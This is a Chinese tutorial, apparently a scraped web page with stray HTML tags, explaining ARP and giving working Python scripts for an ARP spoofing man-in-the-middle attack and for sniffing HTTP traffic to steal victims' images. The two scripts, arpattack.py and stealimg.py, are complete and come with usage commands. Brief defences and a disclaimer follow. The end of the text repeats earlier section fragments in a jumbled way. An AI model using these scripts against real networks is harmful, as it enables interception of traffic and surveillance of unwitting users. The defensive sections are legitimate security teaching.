ARP协议分析与Python实现ARP欺骗攻击<\/h1>

1. ARP协议基础<\/h2>

1.1 ARP协议概述<\/h3>
ARP(Address Resolution Protocol)地址解析协议是一种工作在网络层的协议，用于将IP地址转换为MAC地址(物理地址)。<\/p>

1.2 ARP工作原理<\/h3>

在OSI七层模型中，IP地址位于第三层(网络层)，MAC地址位于第二层(数据链路层)<\/li>
二层设备无法识别IP地址，只能识别MAC地址<\/li>

局域网内机器通信需要先获取对方的物理地址<\/li> <\/ul>

1.3 ARP数据包结构<\/h3>

ARP请求包字段：<\/strong><\/p>

op: 1 (表示ARP请求)<\/li>
hwsrc: 发送方MAC地址(本机MAC)<\/li>
psrc: 发送方IP地址(本机IP)<\/li>
hwdst: 目标MAC地址(初始为00:00:00:00:00:00)<\/li>
pdst: 目标IP地址(通常为网关IP)<\/li> <\/ul>
ARP响应包字段：<\/strong><\/p>

op: 2 (表示ARP响应)<\/li>
hwsrc: 发送方MAC地址(网关MAC)<\/li>
psrc: 发送方IP地址(网关IP)<\/li>
hwdst: 目标MAC地址(请求方MAC)<\/li>
pdst: 目标IP地址(请求方IP)<\/li> <\/ul>
2. ARP欺骗攻击原理<\/h2>
2.1 基本概念<\/h3>
ARP欺骗(ARP Spoofing)是一种中间人攻击技术，通过发送伪造的ARP响应包来欺骗目标主机和网关。<\/p>
2.2 攻击流程<\/h3>

攻击者向目标主机发送伪造ARP响应，声称网关MAC地址是攻击者MAC<\/li>
目标主机更新ARP缓存表，将网关IP映射到攻击者MAC<\/li>
攻击者向网关发送伪造ARP响应，声称目标主机MAC是攻击者MAC<\/li>
网关更新ARP缓存表，将目标主机IP映射到攻击者MAC<\/li>
所有流量经过攻击者主机(可开启IP转发实现中间人攻击)<\/li> <\/ol>
2.3 攻击效果<\/h3>

单向欺骗：仅欺骗目标主机(实现断网攻击)<\/li>
双向欺骗：同时欺骗目标主机和网关(实现中间人攻击)<\/li> <\/ul>
3. Python实现ARP欺骗攻击<\/h2>
3.1 所需环境<\/h3>

Kali Linux操作系统<\/li>
Python 2.7.x<\/li>
Scapy库(用于构造和发送网络数据包)<\/li>
支持的无线网卡(如RT3070)<\/li> <\/ul>
3.2 安装依赖<\/h3>
pip install scapy <\/span><\/span><\/code><\/pre>3.3 ARP攻击脚本(arpattack.py)<\/h3> from<\/span> scapy.all import<\/span> *<\/span> <\/span><\/span>from<\/span> optparse import<\/span> OptionParser <\/span><\/span>import<\/span> sys <\/span><\/span> <\/span><\/span>def<\/span> main<\/span>(): <\/span><\/span> usage =<\/span> "Usage: [-i interface] [-t targetip] [-g gatewayip]"<\/span> <\/span><\/span> parser =<\/span> OptionParser(usage) <\/span><\/span> parser.<\/span>add_option('-i'<\/span>, dest=<\/span>'interface'<\/span>, help=<\/span>'select interface(input eth0 or wlan0 or more)'<\/span>) <\/span><\/span> parser.<\/span>add_option('-t'<\/span>, dest=<\/span>'targetip'<\/span>, help=<\/span>'select ip to spoof'<\/span>) <\/span><\/span> parser.<\/span>add_option('-g'<\/span>, dest=<\/span>'gatewayip'<\/span>, help=<\/span>'input gateway ip'<\/span>) <\/span><\/span> <\/span><\/span> (options, args) =<\/span> parser.<\/span>parse_args() <\/span><\/span> <\/span><\/span> if<\/span> options.<\/span>interface and<\/span> options.<\/span>targetip and<\/span> options.<\/span>gatewayip: <\/span><\/span> interface =<\/span> options.<\/span>interface <\/span><\/span> tip =<\/span> options.<\/span>targetip <\/span><\/span> gip =<\/span> options.<\/span>gatewayip <\/span><\/span> spoof(interface, tip, gip) <\/span><\/span> else<\/span>: <\/span><\/span> parser.<\/span>print_help() <\/span><\/span> sys.<\/span>exit(0<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> spoof<\/span>(interface, tip, gip): <\/span><\/span> localmac =<\/span> get_if_hwaddr(interface) <\/span><\/span> tmac =<\/span> getmacbyip(tip) <\/span><\/span> gmac =<\/span> getmacbyip(gip) <\/span><\/span> <\/span><\/span> # 构造欺骗目标主机的ARP包<\/span> <\/span><\/span> ptarget =<\/span> Ether(src=<\/span>localmac, dst=<\/span>tmac)\/<\/span>ARP(hwsrc=<\/span>localmac, psrc=<\/span>gip, hwdst=<\/span>tmac, pdst=<\/span>tip, op=<\/span>2<\/span>) <\/span><\/span> <\/span><\/span> # 构造欺骗网关的ARP包<\/span> <\/span><\/span> pgateway =<\/span> Ether(src=<\/span>localmac, dst=<\/span>gmac)\/<\/span>ARP(hwsrc=<\/span>localmac, psrc=<\/span>tip, hwdst=<\/span>gmac, pdst=<\/span>gip, op=<\/span>2<\/span>) <\/span><\/span> <\/span><\/span> try<\/span>: <\/span><\/span> while<\/span> 1<\/span>: <\/span><\/span> sendp(ptarget, inter=<\/span>2<\/span>, iface=<\/span>interface) <\/span><\/span> print "send arp reponse to target(<\/span>%s<\/span>), gateway(<\/span>%s<\/span>) macaddress is <\/span>%s<\/span>"<\/span> %<\/span> (tip, gip, localmac) <\/span><\/span> sendp(pgateway, inter=<\/span>2<\/span>, iface=<\/span>interface) <\/span><\/span> print "send arp reponse to gateway(<\/span>%s<\/span>), target(<\/span>%s<\/span>) macaddress is <\/span>%s<\/span>"<\/span> %<\/span> (gip, tip, localmac) <\/span><\/span> except<\/span> KeyboardInterrupt<\/span>: <\/span><\/span> sys.<\/span>exit(0<\/span>) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> main() <\/span><\/span><\/code><\/pre>3.4 脚本使用说明<\/h3> python arpattack.py -i wlan0 -t 192.168.0.108 -g 192.168.0.1 <\/span><\/span><\/code><\/pre>参数说明：<\/p> -i<\/code>: 指定网卡接口(eth0或wlan0)<\/li> -t<\/code>: 指定目标IP地址<\/li> -g<\/code>: 指定网关IP地址<\/li> <\/ul> 3.5 关键函数解析<\/h3> get_if_hwaddr("网卡名称")<\/code>: 获取指定网卡的MAC地址<\/li> getmacbyip("IP地址")<\/code>: 通过ARP协议获取指定IP的MAC地址<\/li> Ether()<\/code>: 构造以太网数据包头<\/li> ARP()<\/code>: 构造ARP数据包<\/li> sendp()<\/code>: 发送二层数据包<\/li> <\/ol> 4. 流量捕获与图片窃取<\/h2> 4.1 所需工具<\/h3> pcap库: 捕获网卡数据包<\/li> dpkt库: 解析数据包<\/li> PIL库: 处理图片<\/li> <\/ul> 安装命令：<\/p> apt-get install libpcap-dev <\/span><\/span>pip install pypcap <\/span><\/span>pip install dpkt <\/span><\/span>pip install PIL <\/span><\/span><\/code><\/pre>4.2 图片窃取脚本(stealimg.py)<\/h3> import<\/span> pcap <\/span><\/span>import<\/span> dpkt <\/span><\/span>import<\/span> re <\/span><\/span>import<\/span> requests <\/span><\/span>from<\/span> PIL import<\/span> Image <\/span><\/span>from<\/span> io import<\/span> BytesIO <\/span><\/span>from<\/span> optparse import<\/span> OptionParser <\/span><\/span>import<\/span> sys <\/span><\/span> <\/span><\/span>urllist =<\/span> [] <\/span><\/span> <\/span><\/span>def<\/span> main<\/span>(): <\/span><\/span> usage =<\/span> "Usage: [-i interface]"<\/span> <\/span><\/span> parser =<\/span> OptionParser(usage) <\/span><\/span> parser.<\/span>add_option('-i'<\/span>, dest=<\/span>'interface'<\/span>, help=<\/span>'select interface(input eth0 or wlan0 or more)'<\/span>) <\/span><\/span> <\/span><\/span> (options, args) =<\/span> parser.<\/span>parse_args() <\/span><\/span> <\/span><\/span> if<\/span> options.<\/span>interface: <\/span><\/span> interface =<\/span> options.<\/span>interface <\/span><\/span> pc =<\/span> pcap.<\/span>pcap(interface) <\/span><\/span> pc.<\/span>setfilter('tcp port 80'<\/span>) <\/span><\/span> <\/span><\/span> for<\/span> ptime, pdata in<\/span> pc: <\/span><\/span> getimg(pdata) <\/span><\/span> else<\/span>: <\/span><\/span> parser.<\/span>print_help() <\/span><\/span> sys.<\/span>exit(0<\/span>) <\/span><\/span> <\/span><\/span>def<\/span> getimg<\/span>(pdata): <\/span><\/span> global<\/span> urllist <\/span><\/span> p =<\/span> dpkt.<\/span>ethernet.<\/span>Ethernet(pdata) <\/span><\/span> <\/span><\/span> if<\/span> p.<\/span>data.<\/span>__class__.<\/span>__name__ ==<\/span> 'IP'<\/span>: <\/span><\/span> if<\/span> p.<\/span>data.<\/span>data.<\/span>__class__.<\/span>__name__ ==<\/span> 'TCP'<\/span>: <\/span><\/span> if<\/span> p.<\/span>data.<\/span>data.<\/span>dport ==<\/span> 80<\/span>: <\/span><\/span> pa =<\/span> re.<\/span>compile(r<\/span>'GET (.*?\.jpg)'<\/span>) <\/span><\/span> img =<\/span> re.<\/span>findall(pa, p.<\/span>data.<\/span>data.<\/span>data) <\/span><\/span> <\/span><\/span> if<\/span> img !=<\/span> []: <\/span><\/span> lines =<\/span> p.<\/span>data.<\/span>data.<\/span>data.<\/span>split('<\/span>\n<\/span>'<\/span>) <\/span><\/span> <\/span><\/span> for<\/span> line in<\/span> lines: <\/span><\/span> if<\/span> 'Host:'<\/span> in<\/span> line: <\/span><\/span> url =<\/span> 'http:\/\/'<\/span> +<\/span> line.<\/span>split(':'<\/span>)[-<\/span>1<\/span>].<\/span>strip() +<\/span> img[-<\/span>1<\/span>] <\/span><\/span> <\/span><\/span> if<\/span> url not<\/span> in<\/span> urllist: <\/span><\/span> urllist.<\/span>append(url) <\/span><\/span> <\/span><\/span> if<\/span> 'Referer:'<\/span> in<\/span> p.<\/span>data.<\/span>data.<\/span>data: <\/span><\/span> for<\/span> line in<\/span> lines: <\/span><\/span> if<\/span> 'Referer:'<\/span> in<\/span> line: <\/span><\/span> referer =<\/span> line.<\/span>split(':'<\/span>)[-<\/span>1<\/span>].<\/span>strip() <\/span><\/span> print url <\/span><\/span> r =<\/span> requests.<\/span>get(url, headers=<\/span>{'Referer'<\/span>: referer}) <\/span><\/span> img =<\/span> Image.<\/span>open(BytesIO(r.<\/span>content)) <\/span><\/span> img.<\/span>show() <\/span><\/span> else<\/span>: <\/span><\/span> r =<\/span> requests.<\/span>get(url) <\/span><\/span> img =<\/span> Image.<\/span>open(BytesIO(r.<\/span>content)) <\/span><\/span> img.<\/span>show() <\/span><\/span> else<\/span>: <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>: <\/span><\/span> main() <\/span><\/span><\/code><\/pre>4.3 脚本使用说明<\/h3> python stealimg.py -i wlan0 <\/span><\/span><\/code><\/pre>4.4 工作原理<\/h3> 捕获经过网卡的所有HTTP流量(tcp 80端口)<\/li> 使用正则表达式过滤图片请求(GET *.jpg)<\/li> 提取图片URL并下载显示<\/li> 对于需要Referer的网站(如百度)，自动添加Referer头<\/li> <\/ol> 5. 防御措施<\/h2> 5.1 静态ARP绑定<\/h3> 在主机和网关设置静态ARP条目：<\/p> arp -s 网关IP 网关MAC <\/span><\/span><\/code><\/pre>5.2 使用ARP防火墙<\/h3> 安装ARP防火墙软件，检测并阻止异常ARP包<\/p> 5.3 网络设备防护<\/h3> 启用交换机的端口安全功能<\/li> 配置DHCP Snooping<\/li> 启用动态ARP检测(DAI)<\/li> <\/ul> 6. 法律与道德声明<\/h2> ARP欺骗攻击属于网络攻击行为，未经授权的网络渗透和监听可能违反法律。本文仅用于网络安全教育和技术研究目的，请勿用于非法用途。<\/p>

ARP协议分析与Python实现ARP欺骗攻击<\/h1>

1. ARP协议基础<\/h2>

1.1 ARP协议概述<\/h3> ARP(Address Resolution Protocol)地址解析协议是一种工作在网络层的协议，用于将IP地址转换为MAC地址(物理地址)。<\/p>

2. ARP欺骗攻击原理<\/h2>

2.1 基本概念<\/h3> ARP欺骗(ARP Spoofing)是一种中间人攻击技术，通过发送伪造的ARP响应包来欺骗目标主机和网关。<\/p>

3. Python实现ARP欺骗攻击<\/h2>

4. 流量捕获与图片窃取<\/h2>

5. 防御措施<\/h2>

5.2 使用ARP防火墙<\/h3> 安装ARP防火墙软件，检测并阻止异常ARP包<\/p>

6. 法律与道德声明<\/h2> ARP欺骗攻击属于网络攻击行为，未经授权的网络渗透和监听可能违反法律。本文仅用于网络安全教育和技术研究目的，请勿用于非法用途。<\/p>

1.1 ARP协议概述<\/h3>
ARP(Address Resolution Protocol)地址解析协议是一种工作在网络层的协议，用于将IP地址转换为MAC地址(物理地址)。<\/p>

2.1 基本概念<\/h3>
ARP欺骗(ARP Spoofing)是一种中间人攻击技术，通过发送伪造的ARP响应包来欺骗目标主机和网关。<\/p>

5.2 使用ARP防火墙<\/h3>
安装ARP防火墙软件，检测并阻止异常ARP包<\/p>

6. 法律与道德声明<\/h2>
ARP欺骗攻击属于网络攻击行为，未经授权的网络渗透和监听可能违反法律。本文仅用于网络安全教育和技术研究目的，请勿用于非法用途。<\/p>